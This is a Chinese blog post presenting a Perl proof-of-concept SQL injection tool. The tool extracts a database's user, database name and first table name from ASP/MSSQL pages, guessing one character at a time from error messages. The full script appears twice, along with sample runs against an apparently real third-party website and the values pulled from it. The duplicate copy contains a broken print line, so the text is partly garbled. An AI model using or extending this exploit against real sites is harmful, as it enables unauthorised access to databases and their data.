昨天看了cawan《SQL Injection做数据库渗透的一种思路》一文,感觉确实不错。于是我就把它文中提出的方法用perl实现了一下。这个程序只是个POC版本,所以呢我只实现了猜解user、db_name以及第一个表名的功能,其它功能尚未实现。而且程序中猜解部分的算法我也没有优化,用了最容易编程但是速度和效率相对低的算法,明眼人一看就知道。
如果大家觉得有必要,可以考虑将该程序扩展,增加包括猜解所有表名以及表中字段的功能等等。当然,如果要发布就不要用perl了~~~~
程序运行帮助如下:
H:/temp>sin.pl
********************************************************************************
SQL Injection New Method POC
Method By cawan[EST]
Coded By superlone[EST]
Usage:
sin.pl url
-u try to get user() return value
-d try to get db_name() return value
-t try to get first table name value
EXAMPLE:
sin.pl http://www.xxx.com/userinfo.asp?id=1 -t
********************************************************************************
猜解user的过程如下:
H:/temp>sin.pl http://www.aquavelvas.com/blog.asp?id=4 -u
[+]Testing if there is vul in your URL page...
[+]SQL Injection Vulnerability found!
[+]Guessing user() return value length...Wait!
********************************************************************************
[+]user() return value length is [7]
********************************************************************************
[+]Guessing user() return value...Wait!
********************************************************************************
[+]the 1th letter is:t
[+]the 2th letter is:h
[+]the 3th letter is:o
[+]the 4th letter is:m
[+]the 5th letter is:a
[+]the 6th letter is:s
[+]the 7th letter is:a
[+]user() return value is [thomasa]
********************************************************************************
猜解第一个表名的过程如下:
H:/temp>sin.pl http://www.aquavelvas.com/blog.asp?id=4 -t
[+]Testing if there is vul in your URL page...
[+]SQL Injection Vulnerability found!
[+]Guessing first table name length...Wait!
********************************************************************************
[+]first table name length is [17]
[+]Guessing first table name value...Wait!
[+]the 1th letter is:g
[+]the 2th letter is:e
[+]the 3th letter is:o
[+]the 4th letter is:i
[+]the 5th letter is:p
[+]the 6th letter is:c
[+]the 7th letter is:o
[+]the 8th letter is:u
[+]the 9th letter is:n
[+]the 10th letter is:t
[+]the 11th letter is:r
[+]the 12th letter is:y
[+]the 13th letter is:w
[+]the 14th letter is:h
[+]the 15th letter is:o
[+]the 16th letter is:i
[+]the 17th letter is:s
[+]first table name value is [geoipcountrywhois]
********************************************************************************
非常简单的实现,大家就不要笑话我了。。。整个代码如下:
#!/usr/bin/perl
#method by cawan{EST]
#coded by superlone[EST]
#use strict;
use LWP::UserAgent;
local @alpha_code=('a'...'z');
local @number_code=(0...9);
if(@ARGV==0){
&help;}
my $url=shift;
my $ua=new LWP::UserAgent;
if($ARGV[0] eq "-u"){
&testpage($url);
print "[+]Guessing user() return value length...Wait!/n/n";
print "*" x 80,"/n";
my $ilen=&guesslength($url,"user");
print "[+]user() return value length is [".$ilen."]/n/n";
print "*" x 80,"/n";
print "[+]Guessing user() return value...Wait!/n/n";
print "*" x 80,"/n";
print "[+]user() return value is ". &crackcode($url,$ilen,"user") ."/n/n";
print "*" x 80,"/n";} elsif($ARGV[0] eq "-d"){
&testpage($url);
print "[+]Guessing db_name() return value length...Wait!/n/n";
print "*" x 80,"/n";
$ilen=&guesslength($url,"db_name");
print "[+]user() return value length is [".$ilen."]/n/n";
print "[+]Guessing db_name() return value...Wait!/n/n";
print "*" x 80,"/n";
print "[+]db_name() return value is ". &crackcode($url,$ilen,"db_name") ."/n/n";
print "*" x 80,"/n";}elsif($ARGV[0] eq "-t"){
&testpage($url);
print "[+]Guessing first table name length...Wait!/n/n";
print "*" x 80,"/n";
$ilen=&guesslength($url,"table");
print "[+]first table name length is [".$ilen."]/n/n";
print "[+]Guessing first table name value...Wait!/n/n";
print "[+]first table name value is ". &crackcode($url,$ilen,"table") ."/n/n";
print "*" x 80,"/n";} else{&help;}
sub guesslength{
my $url=shift;
my $func=shift;
$func="(select top 1 name from sysobjects where xtype='U')" if($func eq "table");
my $i=0;
while($i<32)
{
my $temp=$url."'%20and%20len(".$func.")>'".$i++;
#print "[-]Structured URL:"."$temp"."/n";
my $req=new HTTP::Request('GET'=>$temp);
my $res=$ua->request($req);
if($res->content=~/Syntax error/ ||$res->content=~/Either BOF or EOF is True/ ){
last;
}
}
return $i-1;
}
sub testpage{
my $url=shift;
$url.=" and 1=1";
my $ua=new LWP::UserAgent;
my $req=new HTTP::Request('GET'=>$url);
#print "URL is ".$url."/n";
print "/n[+]Testing if there is vul in your URL page.../n/n";
my $res=$ua->request($req);
#print "return content:".$res->content."/n";
if($res->content=~/Syntax error/){
print "[+]SQL Injection Vulnerability found!/n/n";} else {
print "[+]Page has no vul or server error echo disabled!/n/n";
exit;
}
}
sub help{
print "*" x 80,"/n";
print "/t/tSQL Injection New Method POC/n/n";
print "/t/t Method By cawan[EST]/n/n";
print "/t/t Coded By superlone[EST]/n/n";
print "/tUsage:/n/t/tsin.pl url/n/n";
print "/t/t-u try to get user() return value/n";
print "/t/t-d try to get db_name() return value/n";
print "/t/t-t try to get first table name value/n";
print "/tEXAMPLE:/n/t/tsin.pl [url]http://www.xxx.com/userinfo.asp?id=1[/url] -t/n/n";
print "*" x 80,"/n";
exit;
}
sub crackcode{
my $url=shift;
my $userlen=shift;
my $func=shift;
my $i=0;
my $j=0;
my $k=1;
my $bfound=0;
my $name;
$func="(select top 1 name from sysobjects where xtype='U')" if($func eq "table");
while($k<=$userlen){
$i=0;$j=0;$bfound=0;
while($i<@alpha_code){
my $temp=$url."'%20and%20substring(".$func.",".$k.",1)='".$alpha_code[$i++];
#print $temp,"/n";
my $req=new HTTP::Request('GET'=>$temp);
my $res=$ua->request($req);
if($res->content=~/Incorrect syntax/){
$name.=$alpha_code[$i-1];
print "[+]the ".$k."th letter is:",$alpha_code[$i-1],"/n";
$bfound=1;
last;}
}
while($j<@number_code && $bfound==0){
my $temp=$url."'%20and%20substring(".$func.",".$k.",1)='".$number_code[$j++];
#print $temp,"/n";
my $req=new HTTP::Request('GET'=>$temp);
my $res=$ua->request($req);
if($res->content=~/Incorrect syntax/){
$name.=$number_code[$j-1];
print "[+]the ".$k."th letter is:",$alpha_code[$i-1],"/n";
$bfound=0;
last;
}
}
$k++;
}
return '['.$name.']';
}
如果大家觉得有必要,可以考虑将该程序扩展,增加包括猜解所有表名以及表中字段的功能等等。当然,如果要发布就不要用perl了~~~~
程序运行帮助如下:
H:/temp>sin.pl
********************************************************************************
SQL Injection New Method POC
Method By cawan[EST]
Coded By superlone[EST]
Usage:
sin.pl url
-u try to get user() return value
-d try to get db_name() return value
-t try to get first table name value
EXAMPLE:
sin.pl http://www.xxx.com/userinfo.asp?id=1 -t
********************************************************************************
猜解user的过程如下:
H:/temp>sin.pl http://www.aquavelvas.com/blog.asp?id=4 -u
[+]Testing if there is vul in your URL page...
[+]SQL Injection Vulnerability found!
[+]Guessing user() return value length...Wait!
********************************************************************************
[+]user() return value length is [7]
********************************************************************************
[+]Guessing user() return value...Wait!
********************************************************************************
[+]the 1th letter is:t
[+]the 2th letter is:h
[+]the 3th letter is:o
[+]the 4th letter is:m
[+]the 5th letter is:a
[+]the 6th letter is:s
[+]the 7th letter is:a
[+]user() return value is [thomasa]
********************************************************************************
猜解第一个表名的过程如下:
H:/temp>sin.pl http://www.aquavelvas.com/blog.asp?id=4 -t
[+]Testing if there is vul in your URL page...
[+]SQL Injection Vulnerability found!
[+]Guessing first table name length...Wait!
********************************************************************************
[+]first table name length is [17]
[+]Guessing first table name value...Wait!
[+]the 1th letter is:g
[+]the 2th letter is:e
[+]the 3th letter is:o
[+]the 4th letter is:i
[+]the 5th letter is:p
[+]the 6th letter is:c
[+]the 7th letter is:o
[+]the 8th letter is:u
[+]the 9th letter is:n
[+]the 10th letter is:t
[+]the 11th letter is:r
[+]the 12th letter is:y
[+]the 13th letter is:w
[+]the 14th letter is:h
[+]the 15th letter is:o
[+]the 16th letter is:i
[+]the 17th letter is:s
[+]first table name value is [geoipcountrywhois]
********************************************************************************
非常简单的实现,大家就不要笑话我了。。。整个代码如下:
#!/usr/bin/perl
#method by cawan{EST]
#coded by superlone[EST]
#use strict;
use LWP::UserAgent;
local @alpha_code=('a'...'z');
local @number_code=(0...9);
if(@ARGV==0){
&help;}
my $url=shift;
my $ua=new LWP::UserAgent;
if($ARGV[0] eq "-u"){
&testpage($url);
print "[+]Guessing user() return value length...Wait!/n/n";
print "*" x 80,"/n";
my $ilen=&guesslength($url,"user");
print "[+]user() return value length is [".$ilen."]/n/n";
print "*" x 80,"/n";
print "[+]Guessing user() return value...Wait!/n/n";
print "*" x 80,"/n";
print "[+]user() return value is ". &crackcode($url,$ilen,"user") ."/n/n";
print "*" x 80,"/n";} elsif($ARGV[0] eq "-d"){
&testpage($url);
print "[+]Guessing db_name() return value length...Wait!/n/n";
print "*" x 80,"/n";
$ilen=&guesslength($url,"db_name");
print "[+]user() return value length is [".$ilen."]/n/n";
print "[+]Guessing db_name() return value...Wait!/n/n";
print "*" x 80,"/n";
print "[+]db_name() return value is ". &crackcode($url,$ilen,"db_name") ."/n/n";
print "*" x 80,"/n";}elsif($ARGV[0] eq "-t"){
&testpage($url);
print "[+]Guessing first table name length...Wait!/n/n";
print "*" x 80,"/n";
$ilen=&guesslength($url,"table");
print "[+]first table name length is [".$ilen."]/n/n";
print "[+]Guessing first table name value...Wait!/n/n";
print "[+]first table name value is ". &crackcode($url,$ilen,"table") ."/n/n";
print "*" x 80,"/n";} else{&help;}
sub guesslength{
my $url=shift;
my $func=shift;
$func="(select top 1 name from sysobjects where xtype='U')" if($func eq "table");
my $i=0;
while($i<32)
{
my $temp=$url."'%20and%20len(".$func.")>'".$i++;
#print "[-]Structured URL:"."$temp"."/n";
my $req=new HTTP::Request('GET'=>$temp);
my $res=$ua->request($req);
if($res->content=~/Syntax error/ ||$res->content=~/Either BOF or EOF is True/ ){
last;
}
}
return $i-1;
}
sub testpage{
my $url=shift;
$url.=" and 1=1";
my $ua=new LWP::UserAgent;
my $req=new HTTP::Request('GET'=>$url);
#print "URL is ".$url."/n";
print "/n[+]Testing if there is vul in your URL page.../n/n";
my $res=$ua->request($req);
#print "return content:".$res->content."/n";
if($res->content=~/Syntax error/){
print "[+]SQL Injection Vulnerability found!/n/n";} else {
print "[+]Page has no vul or server error echo disabled!/n/n";
exit;
}
}
sub help{
print "*" x 80,"/n";
print "/t/tSQL Injection New Method POC/n/n";
print "/t/t Method By cawan[EST]/n/n";
print "/t/t Coded By superlone[EST]/n/n";
print "/tUsage:/n/t/tsin.pl url
print "/t/t-u try to get user() return value/n";
print "/t/t-d try to get db_name() return value/n";
print "/t/t-t try to get first table name value/n";
print "/tEXAMPLE:/n/t/tsin.pl [url]http://www.xxx.com/userinfo.asp?id=1[/url] -t/n/n";
print "*" x 80,"/n";
exit;
}
sub crackcode{
my $url=shift;
my $userlen=shift;
my $func=shift;
my $i=0;
my $j=0;
my $k=1;
my $bfound=0;
my $name;
$func="(select top 1 name from sysobjects where xtype='U')" if($func eq "table");
while($k<=$userlen){
$i=0;$j=0;$bfound=0;
while($i<@alpha_code){
my $temp=$url."'%20and%20substring(".$func.",".$k.",1)='".$alpha_code[$i++];
#print $temp,"/n";
my $req=new HTTP::Request('GET'=>$temp);
my $res=$ua->request($req);
if($res->content=~/Incorrect syntax/){
$name.=$alpha_code[$i-1];
print "[+]the ".$k."th letter is:",$alpha_code[$i-1],"/n";
$bfound=1;
last;}
}
while($j<@number_code && $bfound==0){
my $temp=$url."'%20and%20substring(".$func.",".$k.",1)='".$number_code[$j++];
#print $temp,"/n";
my $req=new HTTP::Request('GET'=>$temp);
my $res=$ua->request($req);
if($res->content=~/Incorrect syntax/){
$name.=$number_code[$j-1];
print "[+]the ".$k."th letter is:",$alpha_code[$i-1],"/n";
$bfound=0;
last;
}
}
$k++;
}
return '['.$name.']';
}
扫一扫
563
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
